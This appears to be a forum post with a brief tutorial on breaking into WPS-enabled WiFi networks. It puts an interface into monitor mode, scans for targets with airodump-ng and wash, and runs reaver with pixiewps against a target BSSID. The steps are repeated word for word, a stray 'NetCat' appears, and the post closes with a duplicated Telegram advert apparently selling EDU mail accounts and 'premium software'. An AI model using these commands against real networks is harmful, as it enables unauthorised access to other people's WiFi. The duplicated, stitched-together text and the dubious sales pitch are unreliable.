[ Hidden Content! ]
First, we should set up our Wireless device in Monitoring mode.
airmon-ng start wlan0
You should notice for the device is set up in the Monitor mode wlan0mon.
airodump-ng wlan0mon
Now we can see the BSSID of the devices that near to us and you can also use wahs -i wlan0mon to display all WPS enabled WiFi networks.
We have gathered all the required information, now time to attack from Reaver.
reaver -i wlan0mon -b BSSID –vvv -K 1
Ex: reaver -i wlan0mon -b BC:EF:19:17:0A:4C –vvv -K 1
Where:
-i Indicates interface
-b BSSID of the target AP
-v verbose
-K Run pixiewps
It will go on scanning with all WPS pin available.
If it finds a matching PIN it will go and be exploiting it.
airmon-ng start wlan0
You should notice for the device is set up in the Monitor mode wlan0mon.
airodump-ng wlan0mon
Now we can see the BSSID of the devices that near to us and you can also use wahs -i wlan0mon to display all WPS enabled WiFi networks.
We have gathered all the required information, now time to attack from Reaver.
reaver -i wlan0mon -b BSSID –vvv -K 1
Ex: reaver -i wlan0mon -b BC:EF:19:17:0A:4C –vvv -K 1
Where:
-i Indicates interface
-b BSSID of the target AP
-v verbose
-K Run pixiewps
It will go on scanning with all WPS pin available.
If it finds a matching PIN it will go and be exploiting it.
NetCat
Need Private High Quality EDU MAIL and Premium Software?
👇👇👇
Telegram: John Weekend
(@johnathanweek)
Need Private High Quality EDU MAIL and Premium Software?
👇👇👇
Telegram: John Weekend
(@johnathanweek)
